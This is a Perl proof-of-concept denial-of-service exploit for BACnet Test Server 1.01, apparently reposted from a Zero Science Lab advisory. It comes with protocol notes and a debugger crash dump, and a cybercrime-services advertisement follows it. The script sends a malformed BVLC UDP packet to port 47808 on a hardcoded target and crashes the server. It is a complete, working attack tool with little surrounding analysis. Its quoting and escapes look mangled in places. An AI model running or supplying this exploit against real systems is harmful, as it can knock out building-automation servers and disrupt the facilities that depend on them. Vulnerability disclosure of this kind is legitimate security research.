#!/usr/bin/perl
#
# BACnet Test Server 1.01 Remote Denial of Service Exploit
#
#
# Vendor: BACnet Interoperability Test Services, Inc.
# Product web page: https://www.bac-test.com
# https://sourceforge.com/projects/bacnetserver
# Affected version: 1.01 (BACnet Stack Version 0.5.7)
#
# Summary: This is a simple BACnet Server aimed at developers who
# want to explore or test their BACnet Client implementations of
# the ASHRAE BACnet protocol. It is based on Steve Karg’s fine
# implementation of the BACnet Stack.
#
# Desc: The BACNet Test Server is vulnerable to a denial of service
# (DoS) vulnerability when sending malformed BVLC Length UDP packet
# to port 47808 causing the application to crash.
#
# Type – 0x81
# BVLC Function
# – 0x01 – Write Broadcast Distribution Table
# – 0x02 – Read Broadcast Distribution Table
# – 0x03 – Read Broadcast Distribution Table ACK
# – 0x04 – Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header
# – 0x05 – Register Foreign Device with expiration timeout (Time-to-live) in seconds
# – 0x0a – Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router.
# Optional Originating Device IP address and Port NOT included in BVLL header.
# – 0x0b – Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks.
# – 0x0c – Secure-BVLL
# – BVLL Length
# – IP address of Originating Device – optional depending on BVLC Function Code
# – Port number of Originating Device – optional depending on BVLC Function Code
# – NPDU – Network Layer Protocol Data Unit
#
# =================================================================
# (67c.2f34): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** WARNING: Unable to verify checksum for C:Program Files (x86)BACnet Interoperability Testing Services, IncBACnet ServerServer.exe
# eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00
# eip=00994313 esp=005fec04 ebp=005fed00 iopl=0 nv up ei pl nz ac pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
# Server+0x34313:
# 00994313 8810 mov byte ptr [eax],dl ds:002b:00600000=??
# 0:000> d 994313 +77
# 0099438a cccccccc
# 0099438e cccccccc
# 00994392 cccccccc
# 00994396 cccccccc
# 0099439a cccccccc
# 0:000> d esp
# 005fec04 005ff3f8
# 005fec08 005ff408
# 005fec0c 00692000
# 005fec10 cccccccc
# 005fec14 cccccccc
# 004fec18 cccccccc
# =================================================================
#
# Tested on: Microsoft Windows 10 Professional (EN)
# Microsoft Windows 7 Professional SP1 (EN)
#
#
# Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5597
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php
#
#
# 05.08.2019
#

use strict;
use warnings;
use IO::Socket::INET;

my $target = “10.0.99.34”;
my $porta = 47808;
my $proto = “udp”;
my $stype = SOCK_DGRAM;
my $timeout = 1;

my $socket = new IO::Socket::INET (
PeerHost => $target,
PeerPort => $porta,
Proto => $proto,
Type => $stype,
Timeout => $timeout
) or die “Socket error. : $!n”;

print “Connected to: $target:$portan”;

$| = 1;
binmode $socket;

my $data = “x81x09xFFxFE”;

print “Sending: $data [ “.length($data).” bytes ]n”;
send ($socket, $data, 0) or die “Nope: $!n”;
print “Done.n”;

$socket->close();



Source link

Is your business effected by Cyber Crime?

If a cyber crime or cyber attack happens to you, you need to respond quickly. Cyber crime in its several formats such as online identity theft, financial fraud, stalking, bullying, hacking, e-mail fraud, email spoofing, invoice fraud, email scams, banking scam, CEO fraud. Cyber fraud can lead to major disruption and financial disasters. Contact Digitpol’s hotlines or respond to us online.

Digitpol’s Cyber Crime Investigation Unit provides investigative support to victims of cyber crimes. Digitpol is available 24/7. https://digitpol.com/cybercrime-investigation/

Europe +31558448040
UK +44 20 8089 9944
ASIA +85239733884